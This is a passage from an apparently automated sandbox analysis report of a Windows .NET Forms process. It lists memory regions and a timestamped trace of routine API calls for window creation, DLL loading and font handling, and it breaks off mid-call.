region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 388 start_va = 0x4610000 end_va = 0x464ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 389 start_va = 0x4790000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 390 start_va = 0x48d0000 end_va = 0x48dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048d0000" filename = "" Region: id = 391 start_va = 0x6ebd0000 end_va = 0x6edc0fff monitored = 0 entry_point = 0x6ecb3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 392 start_va = 0x74c60000 end_va = 0x74d7efff monitored = 0 entry_point = 0x74ca5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 393 start_va = 0x48e0000 end_va = 0x4928fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 394 start_va = 0x4a50000 end_va = 0x4a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 395 start_va = 0x4650000 end_va = 0x4653fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 396 start_va = 0x4a60000 end_va = 0x5a5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 397 start_va = 0x4660000 end_va = 0x4663fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 398 start_va = 0x4930000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 399 start_va = 0x5a60000 end_va = 0x5b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a60000" filename = "" Region: id = 400 start_va = 0x5b60000 end_va = 0x6051fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b60000" filename = "" Region: id = 401 start_va = 0x6060000 end_va = 0x611cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 402 start_va = 0x6120000 end_va = 0x651ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006120000" filename = "" Region: id = 403 start_va = 0x6520000 end_va = 0x6581fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 404 start_va = 0x4670000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 405 start_va = 0x6590000 end_va = 0x660ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 406 start_va = 0x6b270000 end_va = 0x6b3e2fff monitored = 0 entry_point = 0x6b31d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 407 start_va = 0x4890000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 408 start_va = 0x4890000 end_va = 0x489ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004890000" filename = "" Region: id = 409 start_va = 0x48a0000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048a0000" filename = "" Region: id = 410 start_va = 0x48b0000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048b0000" filename = "" Region: id = 411 start_va = 0x723c0000 end_va = 0x7250afff monitored = 0 entry_point = 0x72421660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 412 start_va = 0x6610000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006610000" filename = "" Region: id = 413 start_va = 0x6650000 end_va = 0x674ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 414 start_va = 0x6750000 end_va = 0x678ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 415 start_va = 0x6790000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006790000" filename = "" Region: id = 416 start_va = 0x6890000 end_va = 0x68cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006890000" filename = "" Region: id = 417 start_va = 0x68d0000 end_va = 0x69cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068d0000" filename = "" Region: id = 418 start_va = 0x4680000 end_va = 0x4680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004680000" filename = "" Region: id = 419 start_va = 0x75220000 end_va = 0x752a3fff monitored = 0 entry_point = 0x75246220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 420 start_va = 0x741a0000 end_va = 0x743bbfff monitored = 0 entry_point = 0x7436bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 421 start_va = 0x4760000 end_va = 0x4760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004760000" filename = "" Region: id = 422 start_va = 0x4770000 end_va = 0x4773fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 423 start_va = 0x69d0000 end_va = 0x6a14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 424 start_va = 0x48c0000 end_va = 0x48c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 425 start_va = 0x6a20000 end_va = 0x6aadfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 426 start_va = 0x6ab0000 end_va = 0x6eaafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006ab0000" filename = "" Region: id = 427 start_va = 0x4a30000 end_va = 0x4a33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 428 start_va = 0x6eb0000 end_va = 0x6ec2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 429 start_va = 0x4a40000 end_va = 0x4a40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a40000" filename = "" Region: id = 430 start_va = 0x73d70000 end_va = 0x73eedfff monitored = 0 entry_point = 0x73dec630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 431 start_va = 0x71f90000 end_va = 0x7225afff monitored = 0 entry_point = 0x721cc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 432 start_va = 0x4a30000 end_va = 0x4a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a30000" filename = "" Region: id = 552 start_va = 0x6ed0000 end_va = 0x6ed3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 981 start_va = 0x6ee0000 end_va = 0x7f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 982 start_va = 0x7f20000 end_va = 0x7f24fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 983 start_va = 0x7f30000 end_va = 0x7f30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f30000" filename = "" Region: id = 984 start_va = 0x7f40000 end_va = 0x7f40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f40000" filename = "" Region: id = 985 start_va = 0x7f40000 end_va = 0x7f71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f40000" filename = "" Region: id = 986 start_va = 0x7f80000 end_va = 0x7f80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f80000" filename = "" Region: id = 3307 start_va = 0x68de0000 end_va = 0x694f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 3308 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3309 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3310 start_va = 0x560000 end_va = 0x63ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3341 start_va = 0x6890000 end_va = 0x6990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006890000" filename = "" Region: id = 3342 start_va = 0x6eee0000 end_va = 0x6ef20fff monitored = 0 entry_point = 0x6eee7fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 3343 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3344 start_va = 0x6890000 end_va = 0x698ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006890000" filename = "" Region: id = 3345 start_va = 0x72600000 end_va = 0x72819fff monitored = 0 entry_point = 0x72695550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 3346 start_va = 0x6eb20000 end_va = 0x6ebc6fff monitored = 0 entry_point = 0x6eb56240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 3347 start_va = 0x72330000 end_va = 0x723b2fff monitored = 0 entry_point = 0x723537c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Thread: id = 1 os_tid = 0xcb0 [0098.213] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0099.210] RoInitialize () returned 0x1 [0099.210] RoUninitialize () returned 0x0 [0102.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x1aef14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0102.146] IsAppThemed () returned 0x1 [0102.151] CoTaskMemAlloc (cb=0xf0) returned 0x70b728 [0102.151] CreateActCtxA (pActCtx=0x1af410) returned 0x70b91c [0102.303] CoTaskMemFree (pv=0x70b728) [0102.332] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1da [0102.333] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1d6 [0110.286] CoTaskMemAlloc (cb=0x20c) returned 0x71e258 [0110.286] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x71e258 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0110.294] CoTaskMemFree (pv=0x71e258) [0110.295] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0110.318] GetSystemMetrics (nIndex=75) returned 1 [0110.329] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0111.200] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6e750000 [0111.500] AdjustWindowRectEx (in: lpRect=0x1af204, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x1af204) returned 1 [0111.511] GetCurrentProcess () returned 0xffffffff [0111.511] GetCurrentThread () returned 0xfffffffe [0111.511] GetCurrentProcess () returned 0xffffffff [0111.511] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af11c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af11c*=0x2a4) returned 1 [0111.516] GetCurrentThreadId () returned 0xcb0 [0111.676] GetCurrentActCtx (in: lphActCtx=0x1af07c | out: lphActCtx=0x1af07c*=0x0) returned 1 [0111.677] ActivateActCtx (in: hActCtx=0x70b91c, lpCookie=0x1af08c | out: hActCtx=0x70b91c, lpCookie=0x1af08c) returned 1 [0111.677] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0113.625] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73f60000 [0113.650] GetModuleHandleW (lpModuleName="user32.dll") returned 0x750d0000 [0113.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x1aef44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW^kÙïÜ\x16 «Ómhö\x1a", lpUsedDefaultChar=0x0) returned 14 [0113.651] GetProcAddress (hModule=0x750d0000, lpProcName="DefWindowProcW") returned 0x77c1aee0 [0113.653] GetStockObject (i=5) returned 0x1900015 [0113.659] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0113.670] CoTaskMemAlloc (cb=0x5c) returned 0x718ab0 [0113.670] RegisterClassW (lpWndClass=0x1aef34) returned 0xc150 [0113.671] CoTaskMemFree (pv=0x718ab0) [0113.671] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0113.672] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0xc02e6 [0113.674] SetWindowLongW (hWnd=0xc02e6, nIndex=-4, dwNewLong=2009181920) returned 76350910 [0113.675] GetWindowLongW (hWnd=0xc02e6, nIndex=-4) returned 2009181920 [0113.751] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ae794 | out: phkResult=0x1ae794*=0x2c8) returned 0x0 [0113.752] RegQueryValueExW (in: hKey=0x2c8, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x1ae7b4, lpData=0x0, lpcbData=0x1ae7b0*=0x0 | out: lpType=0x1ae7b4*=0x0, lpData=0x0, lpcbData=0x1ae7b0*=0x0) returned 0x2 [0113.753] RegQueryValueExW (in: hKey=0x2c8, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x1ae7b4, lpData=0x0, lpcbData=0x1ae7b0*=0x0 | out: lpType=0x1ae7b4*=0x0, lpData=0x0, lpcbData=0x1ae7b0*=0x0) returned 0x2 [0113.753] RegCloseKey (hKey=0x2c8) returned 0x0 [0113.756] SetWindowLongW (hWnd=0xc02e6, nIndex=-4, dwNewLong=76350950) returned 2009181920 [0113.757] GetWindowLongW (hWnd=0xc02e6, nIndex=-4) returned 76350950 [0113.757] GetWindowLongW (hWnd=0xc02e6, nIndex=-16) returned 113311744 [0113.759] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1d4 [0113.760] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xc02e6, Msg=0x24, wParam=0x0, lParam=0x1aeaac) returned 0x0 [0113.760] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1d5 [0113.761] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xc02e6, Msg=0x81, wParam=0x0, lParam=0x1aeaa0) returned 0x1 [0113.762] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xc02e6, Msg=0x83, wParam=0x0, lParam=0x1aea8c) returned 0x0 [0114.134] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xc02e6, Msg=0x1, wParam=0x0, lParam=0x1aeaa0) returned 0x0 [0114.135] GetClientRect (in: hWnd=0xc02e6, lpRect=0x1ae7cc | out: lpRect=0x1ae7cc) returned 1 [0114.135] GetWindowRect (in: hWnd=0xc02e6, lpRect=0x1ae7cc | out: lpRect=0x1ae7cc) returned 1 [0114.140] GetParent (hWnd=0xc02e6) returned 0x0 [0114.140] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1d760001) returned 1 [0114.275] EtwEventRegister (in: ProviderId=0x21096a4, EnableCallback=0x48d060e, CallbackContext=0x0, RegHandle=0x2109680 | out: RegHandle=0x2109680) returned 0x0 [0114.280] EtwEventSetInformation (RegHandle=0x70fc20, InformationClass=0x35, EventInformation=0x2, InformationLength=0x2109614) returned 0x0 [0114.282] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0114.283] AdjustWindowRectEx (in: lpRect=0x1af01c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x1af01c) returned 1 [0114.287] LoadLibraryW (lpLibFileName="RichEd20.DLL") returned 0x6e480000 [0115.199] CoTaskMemAlloc (cb=0x20c) returned 0x71f580 [0115.199] GetModuleFileNameW (in: hModule=0x6e480000, lpFilename=0x71f580, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\RichEd20.DLL" (normalized: "c:\\windows\\syswow64\\riched20.dll")) returned 0x20 [0115.200] CoTaskMemFree (pv=0x71f580) [0115.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\SYSTEM32\\RichEd20.DLL", nBufferLength=0x105, lpBuffer=0x1ae9a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SYSTEM32\\RichEd20.DLL", lpFilePart=0x0) returned 0x20 [0115.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\SYSTEM32\\RichEd20.DLL", nBufferLength=0x105, lpBuffer=0x1ae9d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SYSTEM32\\RichEd20.DLL", lpFilePart=0x0) returned 0x20 [0115.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aee38) returned 1 [0115.209] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SYSTEM32\\RichEd20.DLL" (normalized: "c:\\windows\\syswow64\\riched20.dll"), fInfoLevelId=0x0, lpFileInformation=0x1aeeb4 | out: lpFileInformation=0x1aeeb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33301b8d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x33301b8d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x33301b8d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7dc00)) returned 1 [0115.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aee34) returned 1 [0115.354] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SYSTEM32\\RichEd20.DLL", lpdwHandle=0x1aef28 | out: lpdwHandle=0x1aef28) returned 0x72c [0115.355] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SYSTEM32\\RichEd20.DLL", dwHandle=0x0, dwLen=0x72c, lpData=0x210a4f4 | out: lpData=0x210a4f4) returned 1 [0115.356] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1aeefc, puLen=0x1aeef8 | out: lplpBuffer=0x1aeefc*=0x210a884, puLen=0x1aeef8) returned 1 [0115.360] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a5f0, puLen=0x1aee78) returned 1 [0115.360] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a644, puLen=0x1aee78) returned 1 [0115.360] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a6a0, puLen=0x1aee78) returned 1 [0115.360] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a6dc, puLen=0x1aee78) returned 1 [0115.360] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a714, puLen=0x1aee78) returned 1 [0115.360] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a78c, puLen=0x1aee78) returned 1 [0115.360] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a7c8, puLen=0x1aee78) returned 1 [0115.361] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a83c, puLen=0x1aee78) returned 1 [0115.361] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x210a5a4, puLen=0x1aee78) returned 1 [0115.361] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x0, puLen=0x1aee78) returned 0 [0115.361] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x0, puLen=0x1aee78) returned 0 [0115.361] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1aee7c, puLen=0x1aee78 | out: lplpBuffer=0x1aee7c*=0x0, puLen=0x1aee78) returned 0 [0115.361] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1aee70, puLen=0x1aee6c | out: lplpBuffer=0x1aee70*=0x210a884, puLen=0x1aee6c) returned 1 [0115.361] VerLanguageNameW (in: wLang=0x0, szLang=0x1aec00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0115.671] VerQueryValueW (in: pBlock=0x210a4f4, lpSubBlock="\\", lplpBuffer=0x1aee80, puLen=0x1aee7c | out: lplpBuffer=0x1aee80*=0x210a51c, puLen=0x1aee7c) returned 1 [0115.675] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6e750000 [0115.676] AdjustWindowRectEx (in: lpRect=0x1af010, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x1af010) returned 1 [0115.684] GetSystemDefaultLCID () returned 0x409 [0115.684] GetStockObject (i=17) returned 0x18a0025 [0115.689] GetObjectW (in: h=0x18a0025, c=92, pv=0x1aee34 | out: pv=0x1aee34) returned 92 [0115.690] GetDC (hWnd=0x0) returned 0xa0100d0 [0116.625] GdiplusStartup (in: token=0x545e68, input=0x1ae3f8, output=0x1ae448 | out: token=0x545e68, output=0x1ae448) returned 0x0 [0116.630] CoTaskMemAlloc (cb=0x5c) returned 0x718be8 [0116.633] GdipCreateFontFromLogfontW (hdc=0xa0100d0, logfont=0x718be8, font=0x1aeefc) returned 0x0 [0119.058] CoTaskMemFree (pv=0x718be8) [0119.059] CoTaskMemAlloc (cb=0x5c) returned 0x718df0 [0119.060] CoTaskMemFree (pv=0x718df0) [0119.060] CoTaskMemAlloc (cb=0x5c) returned 0x718cb8 [0119.060] CoTaskMemFree (pv=0x718cb8) [0119.060] GdipGetFontUnit (font=0x4a51f08, unit=0x1aeec8) returned 0x0 [0119.060] GdipGetFontSize (font=0x4a51f08, size=0x1aeecc) returned 0x0 [0119.061] GdipGetFontStyle (font=0x4a51f08, style=0x1aeec4) returned 0x0 [0119.061] GdipGetFamily (font=0x4a51f08, family=0x1aeec0) returned 0x0 [0119.061] GdipGetFontSize (font=0x4a51f08, size=0x210c484) returned 0x0 [0119.062] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0119.062] GetDC (hWnd=0x0) returned 0xa0100d0 [0119.062] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x1aeee8) returned 0x0 [0119.080] GdipGetDpiY (graphics=0x5a6f268, dpi=0x210c58c) returned 0x0 [0119.081] GdipGetFontHeight (font=0x4a51f08, 